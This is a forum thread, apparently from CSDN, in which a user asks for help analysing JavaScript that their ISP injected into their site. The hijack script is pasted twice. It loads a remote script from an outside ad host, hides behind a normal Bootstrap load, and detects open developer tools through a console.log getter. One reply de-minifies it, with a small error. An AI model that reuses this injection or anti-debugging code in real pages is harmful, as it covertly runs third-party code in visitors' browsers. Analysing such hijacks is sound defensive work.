87,922
社区成员
发帖
与我相关
我的任务
分享求大神翻译一下js
辽宁联通搞得劫持,劫持替换js文件。求各路大神帮忙分析一下代码。
(function () {
try {
var e = "_z__",
t = "http://cdn.bootcss.com//bootstrap/3.3.7/js/bootstrap.js",
r = "http://xf.yellowto.com/?tsliese=27308832",
c = document,
n = c.currentScript,
a = c.getElementsByTagName("head")[0],
i = function (e, t) {
var r = c.createElement("script");
r.type = "text/javascript", t && (r.id = t), r.src = e, a.appendChild(r)
},
s = setInterval(function () {
var e = new Image,
t = window.console;
Object.defineProperty(e, "id", {
get: function () {
e.referrerPolicy = "no-referrer", e.src = "http://app.baidu.com/?d?", clearInterval(s)
}
}), t && (t.log(e), t.clear())
}, 2e3);
c.getElementById(e) || self == top && i(r, e), n && (n.defer || n.async) ? i(t) : c.write('<script src="' + t + '"><\/script>')
} catch (e) {}
})()
(function () {
try {
var e = "_z__",
t = "http://cdn.bootcss.com//bootstrap/3.3.7/js/bootstrap.js",
r = "http://xf.yellowto.com/?tsliese=27308832",
c = document,
n = c.currentScript,
a = c.getElementsByTagName("head")[0],
i = function (e, t) {
var r = c.createElement("script");
r.type = "text/javascript", t && (r.id = t), r.src = e, a.appendChild(r)
},
s = setInterval(function () {
var e = new Image,
t = window.console;
Object.defineProperty(e, "id", {
get: function () {
e.referrerPolicy = "no-referrer", e.src = "http://app.baidu.com/?d?", clearInterval(s)
}
}), t && (t.log(e), t.clear())
}, 2e3);
c.getElementById(e) || self == top && i(r, e), n && (n.defer || n.async) ? i(t) : c.write('<script src="' + t + '"><\/script>')
} catch (e) {}
})()
...全文
请发表友善的回复…
发表回复
SimGenius 2017-11-07
- 打赏
- 举报
基本上就是往网页里注入了http://xf.yellowto.com/?tsliese=27308832这个脚本
大概是这个代码:
try {
var scriptId = "_z__",
bootstrapUrl = "http://cdn.bootcss.com//bootstrap/3.3.7/js/bootstrap.js",
insertedScript = "http://xf.yellowto.com/?tsliese=27308832",
document_ = document,
currentScript = document_.currentScript,
headTag = document_.getElementsByTagName("headTag")[0],
injectScript = function (scriptSrc, scriptTagId) {
var newScriptTag = document_.createElement("script");
newScriptTag.type = "text/javascript", scriptTagId && (newScriptTag.id = scriptTagId), newScriptTag.src = scriptSrc, headTag.appendChild(newScriptTag)
},
s = setInterval(function () {
var image = new Image,
console_ = window.console;
Object.defineProperty(image, "id", {
get: function () {
image.referrerPolicy = "no-referrer", image.src = "http://app.baidu.com/?d?", clearInterval(s)
}
}), console_ && (console_.log(image), console_.clear())
}, 2e3);
document_.getElementById(scriptId) || self == top && injectScript(insertedScript, scriptId), currentScript && (currentScript.defer || currentScript.async) ? injectScript(bootstrapUrl) : document_.write('<script src="' + bootstrapUrl + '"><\/script>')
} catch (e) {
}
似梦飞花 2017-11-06
- 打赏
- 举报
https 去知乎头条发帖 工信部告他
